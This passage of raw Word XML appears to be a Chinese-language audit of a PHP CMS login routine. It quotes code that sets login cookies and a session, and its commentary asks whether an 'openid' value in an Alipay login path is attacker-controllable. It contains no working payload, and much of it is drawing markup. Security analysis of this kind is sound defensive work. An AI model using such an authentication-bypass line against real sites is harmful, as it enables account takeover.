                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>getrow(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$where); if(!$data){</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="1380" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$this-&gt;view-&gt;data = $status;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292EF3">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="3"/>
                    <w:rPr>
                      <w:rFonts w:ascii="Verdana"/>
                      <w:sz w:val="17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cookie::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>set(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'login_username',$data['username']);</w:t>
                  </w:r>
                </w:p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Verdana"/>
                      <w:sz w:val="17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>cookie::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>set(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'login_password',front::cookie_encode($d </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ata['password']));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380" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>session::</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>set(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'username',$data['username']); </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>front::redirect(url::create('user'));</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3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rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t>line</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve"> 157-172:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="35" w:line="271" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里我们看看是不是要写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">session </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>认证</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>信息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都忽略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宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>只关心</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
          <w:spacing w:val="-85"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">openid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho" w:eastAsia="MS Mincho" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生效不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可控不</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="MS Mincho"/>
          <w:sz w:val="25"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3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8792" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:16.3pt;width:337.5pt;height:50.25pt;z-index:544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respond() {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ini_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>set(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>"display_errors","On");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当</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">$classname 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  <w:spacing w:val="-52"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
        </w:rPr>
        <w:t xml:space="preserve">alipaylogin.php </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时候</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w: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跟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去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rPr>
          <w:rFonts w:ascii="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:pict>
          <v:group id="_x0000_s8396" style="position:absolute;margin-left:80.45pt;margin-top:71.85pt;width:338pt;height:572.95pt;z-index:-365368;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordorigin="1609,1437" coordsize="6760,11459">
            <v:rect id="_x0000_s8791" style="position:absolute;left:1617;top:1445;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8790" style="position:absolute;left:1797;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8789" style="position:absolute;left:1897;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8788" style="position:absolute;left:1997;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8787" style="position:absolute;left:2097;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8786" style="position:absolute;left:2197;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8785" style="position:absolute;left:2297;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8784" style="position:absolute;left:2397;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8783" style="position:absolute;left:2497;top:1688;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8782" style="position:absolute;left:2597;top:1688;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8781" style="position:absolute;left:3320;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8780" style="position:absolute;left:3440;top:1688;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8779" style="position:absolute;left:3561;top:1688;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8778" style="position:absolute" from="1612,1442" to="8366,1442" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8777" style="position:absolute" from="1614,1440" to="1614,1951" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8776" style="position:absolute" from="8364,1445" to="8364,1951" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8775" style="position:absolute;left:1617;top:1951;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8774" style="position:absolute;left:1797;top:2014;width:5904;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8773" style="position:absolute" from="1614,1951" to="1614,2277" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8772" style="position:absolute" from="8364,1951" to="8364,2277" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8771" style="position:absolute;left:1617;top:2277;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8770" style="position:absolute;left:1797;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8769" style="position:absolute;left:1897;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8768" style="position:absolute;left:1997;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8767" style="position:absolute;left:2097;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8766" style="position:absolute;left:2197;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8765" style="position:absolute;left:2297;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8764" style="position:absolute;left:2397;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8763" style="position:absolute;left:2497;top:2340;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8762" style="position:absolute;left:2597;top:2340;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8761" style="position:absolute;left:3561;top:2340;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8760" style="position:absolute;left:3681;top:2340;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8759" style="position:absolute;left:3802;top:2340;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8758" style="position:absolute" from="1614,2277" to="1614,2603" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8757" style="position:absolute" from="8364,2277" to="8364,2603" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8756" style="position:absolute;left:1617;top:2603;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8755" style="position:absolute;left:1797;top:2666;width:4699;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8754" style="position:absolute" from="1614,2603" to="1614,2929" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8753" style="position:absolute" from="8364,2603" to="8364,2929" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8752" style="position:absolute;left:1617;top:2929;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8751" style="position:absolute;left:1797;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8750" style="position:absolute;left:1897;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8749" style="position:absolute;left:1997;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8748" style="position:absolute;left:2097;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8747" style="position:absolute;left:2197;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8746" style="position:absolute;left:2297;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8745" style="position:absolute;left:2397;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8744" style="position:absolute;left:2497;top:2992;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8743" style="position:absolute;left:2597;top:2992;width:843;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8742" style="position:absolute;left:3440;top:2992;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8741" style="position:absolute;left:3561;top:2992;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8740" style="position:absolute;left:3681;top:2992;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8739" style="position:absolute" from="1614,2929" to="1614,3255" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8738" style="position:absolute" from="8364,2929" to="8364,3255" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8737" style="position:absolute;left:1617;top:3255;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8736" style="position:absolute;left:1797;top:3318;width:5904;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8735" style="position:absolute" from="1614,3255" to="1614,3581" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8734" style="position:absolute" from="8364,3255" to="8364,3581" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8733" style="position:absolute;left:1617;top:3581;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8732" style="position:absolute;left:1797;top:3644;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8731" style="position:absolute;left:1897;top:3644;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8730" style="position:absolute;left:1997;top:3644;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8729" style="position:absolute;left:2097;top:3644;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8728" style="position:absolute;left:2197;top:3644;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8727" style="position:absolute;left:2297;top:3644;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8726" style="position:absolute;left:2397;top:3644;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8725" style="position:absolute;left:2497;top:3644;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8724" style="position:absolute;left:2597;top:3644;width:2410;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8723" style="position:absolute" from="1614,3581" to="1614,3907" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8722" style="position:absolute" from="8364,3581" to="8364,3907" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8721" style="position:absolute;left:1617;top:3907;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8720" style="position:absolute;left:1797;top:3970;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8719" style="position:absolute;left:1897;top:3970;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8718" style="position:absolute;left:1997;top:3970;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8717" style="position:absolute;left:2097;top:3970;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8716" style="position:absolute;left:2197;top:3970;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8715" style="position:absolute;left:2297;top:3970;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8714" style="position:absolute;left:2397;top:3970;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8713" style="position:absolute;left:2497;top:3970;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8712" style="position:absolute;left:2597;top:3970;width:3012;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8711" style="position:absolute;left:5609;top:3970;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8710" style="position:absolute;left:5730;top:3970;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8709" style="position:absolute;left:5850;top:3970;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8708" style="position:absolute" from="1614,3907" to="1614,4233" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8707" style="position:absolute" from="8364,3907" to="8364,4233" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8706" style="position:absolute;left:1617;top:4233;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8705" style="position:absolute;left:1797;top:4296;width:3133;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8704" style="position:absolute" from="1614,4233" to="1614,4559" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8703" style="position:absolute" from="8364,4233" to="8364,4559" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8702" style="position:absolute;left:1617;top:4559;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8701" style="position:absolute;left:1797;top:4622;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8700" style="position:absolute;left:1897;top:4622;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8699" style="position:absolute;left:1997;top:4622;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8698" style="position:absolute;left:2097;top:4622;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8697" style="position:absolute;left:2197;top:4622;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8696" style="position:absolute;left:2297;top:4622;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8695" style="position:absolute;left:2397;top:4622;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8694" style="position:absolute;left:2497;top:4622;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8693" style="position:absolute;left:2597;top:4622;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8692" style="position:absolute;left:5127;top:4622;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8691" style="position:absolute;left:5248;top:4622;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8690" style="position:absolute;left:5368;top:4622;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8689" style="position:absolute" from="1614,4559" to="1614,4885" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8688" style="position:absolute" from="8364,4559" to="8364,4885" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8687" style="position:absolute;left:1617;top:4885;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8686" style="position:absolute;left:1797;top:4948;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8685" style="position:absolute" from="1614,4885" to="1614,5211" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8684" style="position:absolute" from="8364,4885" to="8364,5211" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8683" style="position:absolute;left:1617;top:5211;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8682" style="position:absolute;left:1797;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8681" style="position:absolute;left:1897;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8680" style="position:absolute;left:1997;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8679" style="position:absolute;left:2097;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8678" style="position:absolute;left:2197;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8677" style="position:absolute;left:2297;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8676" style="position:absolute;left:2397;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8675" style="position:absolute;left:2497;top:5274;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8674" style="position:absolute;left:2597;top:5274;width:3374;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8673" style="position:absolute;left:5971;top:5274;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8672" style="position:absolute;left:6091;top:5274;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8671" style="position:absolute;left:6212;top:5274;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8670" style="position:absolute" from="1614,5211" to="1614,5537" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8669" style="position:absolute" from="8364,5211" to="8364,5537" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8668" style="position:absolute;left:1617;top:5537;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8667" style="position:absolute;left:1797;top:5600;width:4699;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8666" style="position:absolute" from="1614,5537" to="1614,5863" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8665" style="position:absolute" from="8364,5537" to="8364,5863" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8664" style="position:absolute;left:1617;top:5863;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8663" style="position:absolute;left:1797;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8662" style="position:absolute;left:1897;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8661" style="position:absolute;left:1997;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8660" style="position:absolute;left:2097;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8659" style="position:absolute;left:2197;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8658" style="position:absolute;left:2297;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8657" style="position:absolute;left:2397;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8656" style="position:absolute;left:2497;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8655" style="position:absolute;left:2597;top:5926;width:3253;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8654" style="position:absolute;left:5850;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8653" style="position:absolute;left:5950;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8652" style="position:absolute;left:6050;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8651" style="position:absolute;left:6150;top:5926;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8650" style="position:absolute;left:6250;top:5926;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8649" style="position:absolute;left:6371;top:5926;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8648" style="position:absolute;left:6491;top:5926;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8647" style="position:absolute" from="1614,5863" to="1614,6189" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8646" style="position:absolute" from="8364,5863" to="8364,6189" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8645" style="position:absolute;left:1617;top:6189;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8644" style="position:absolute;left:1797;top:6252;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8643" style="position:absolute;left:1897;top:6252;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8642" style="position:absolute;left:1997;top:6252;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8641" style="position:absolute;left:2097;top:6252;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8640" style="position:absolute;left:2197;top:6252;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8639" style="position:absolute;left:2297;top:6252;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8638" style="position:absolute;left:2397;top:6252;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8637" style="position:absolute;left:2497;top:6252;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8636" style="position:absolute;left:2597;top:6252;width:3856;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8635" style="position:absolute;left:6453;top:6252;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8634" style="position:absolute;left:6573;top:6252;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:line id="_x0000_s8633" style="position:absolute" from="1614,6189" to="1614,6515" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:line id="_x0000_s8632" style="position:absolute" from="8364,6189" to="8364,6515" strokecolor="#ccc" strokeweight=".24pt"/>
            <v:rect id="_x0000_s8631" style="position:absolute;left:1617;top:6515;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8630" style="position:absolute;left:1797;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8629" style="position:absolute;left:1897;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8628" style="position:absolute;left:1997;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8627" style="position:absolute;left:2097;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s8626" style="position:absolute;left:2197;top:6578;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
